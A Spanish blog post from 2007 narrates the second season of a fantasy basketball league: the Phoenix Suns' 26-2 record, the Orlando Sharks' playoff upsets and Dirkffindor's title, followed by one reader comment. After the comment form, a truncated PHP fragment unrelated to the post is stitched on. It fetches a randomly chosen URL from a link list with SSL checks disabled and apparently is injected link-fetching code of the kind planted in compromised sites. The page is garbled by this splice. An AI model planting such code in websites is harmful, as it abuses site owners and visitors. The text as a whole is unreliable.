VFL: Historia (II)

21 de December de 2007 por txusma

Segunda temporada

La segunda temporada se presentaba interesante con algunas novedades en las normas. La liga se había consolidado; ya no había que pensar en una liga de simplemente un primer año sino que entraban ya en juego las estrategias a largo plazo. Además, las jornadas se acortaron en número de partidos NBA, con lo cual la liga regular se hacía más dinámica al disputarse en 28 jornadas.

La liga regular nos mostró la mayor exhibición que se haya dado jamás en la TJ. Los Phoenix Suns finalizaron con un balance de 26-2, casi un 93% de victorias. Con este bagaje, el título debía de ser cuestión de trámite. Los Phoenix Suns, comandados por Mika y Jimm, se formaron con la idea de recrear la franquicia Suns en la NBA. De hecho, su primer jugador franquicia fue Shawn Marion. Sus movimientos han sido limitados, pero muy sonados. Un trade al final de la primera temporada les trajo a Kevin Garnett. En la actualidad, Mika sigue al frente de la franquicia, aunque en época de reconstrucción. Aún así, siguen siendo el equipo que presenta mejor balance victorias-derrotas de la TJ.

Para Playoffs se clasificaron cuatro equipos que ya lo habían hecho en la primera temporada y 4 equipos nuevos. Uno de estos nuevos equipos, los Orlando Sharks, se cruzaban con Phoenix Suns al mejor de 5 partidos como rival propicio para la derrota por la vía rápida. Nada más lejos de la realidad. Orlando venció a Phoenix con un 3-0 inapelable. Un equipo que perdía sólo dos partidos de los 28 anteriores llegaba a Playoffs para perder tres partidos seguidos: la magia de los Playoffs. Orlando se iba encontrar en la final de la conferencia Montes con los TS Celtics que había derrotado también por 3-0 a The Engineers, quienes por segundo año consecutivo se iban a las primeras de cambio para casa. TS Celtics era un buen equipo, que en la liga regular había quedado segundo con sólo 7 derrotas. Nuevamente, Orlando buscaba la sorpresa, y la encontró. Y nuevamente, rematando al favorito en un 3-0 fulminante. Los Sharks estaban gestionados por Karlitos y Queco. Karlitos es otro de los fundadores de la TJ, y Queco, una de las grandes incorporaciones que se han ido realizando en los últimos años. Aquel año, Amare era la estrella naciente de un equipo que siempre ha estado en un nivel medio muy competitivo y que se enfrentaba al reto de su primera final.

Mientras, en la conferencia Daimiel, los Seattle Rays había derrotado 3-0 a los Vito Corleone Jugones en primera ronda, mientras que Dirkffindor derrotaba en un ajustado 3-2 a los Alamo’s Beer. La final de la conferencia se preveía igualada y así fue. De hecho, el partido Dirkffindor-Seattle Rays es el que más veces se ha disputado en la TJ, todo un clásico. Los Rays forzaron al límite el quinto partido, que se decidió por la mínima a favor de Dirkffindor gracias al factor cancha ganado en la liga regular y a la memorable actuación de Anthony Johnson, con 27 puntos. Los secundarios han jugado un papel muy decisivo en la TJ a lo largo de su historia.

Orlando, que llegaba con un 6-0, y Dirkffindor, que había ido a 5 partidos en las dos eliminatorias, se jugaban el título. Orlando se presentaba en la final tras 16 partidos seguidos ganados y con factor cancha. Sin embargo, la ventaja de campo se perdería en el primer partido, ganado por Dirkffindor por una diferencia de menos de 2 puntos. El quinteto de Dirkffindor tuvo una gran actuación, con Vince Carter liderando el equipo con 36. El segundo partido, nuevamente jugado en Florida, fue uno de los mejores partidos en las finales TJ. Orlando igualó la final con un extraordinario 180.3 – 161.8. Amare daba muestras de su poderío marcando un inalcanzable 45.5.

Pero la final se iba a decidir en Alemania. En el tercer partido, Dirkffindor ganó con facilidad gracias al 36 de Kidd y el 28.5 del jugador franquicia, Nowitzki. Dirkffindor tenía match ball y no lo desaprovechó. Haciendo 166 puntos en el cuarto partido sentenció la final con un 3-1 claro, incluso con la baja de última hora de Nowitzki, bien cubierta por Vince Carter con 42 y Ray Allen con 33. Bicampeones. Superar ese palmarés se veía, y se ve, muy lejano para el resto de las franquicias. Viva y Frank entraban en la leyenda de la TJ. ¿Habría un three-peat?

Comenta

Un comentario a esta entrada

  1. jimm dice:
    #1

    Que grandes han sido las tres ligas en las que he participado, y que grandes serán las muchas habrán en el futuro.
    Sobre esta segunda temporada destacar dos cosas: los grandes movimientos de jugadores a final de temporada de los Dirk y los Orlando, el gran tapado y el que destrozó a mis Suns en primera ronda de playoff.
    En este año The Others, para mi una de las mejores franquicias en todos estos años, siguieron con su mala racha en el tema lesiones que les volvió a apartar de la lucha por el título.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>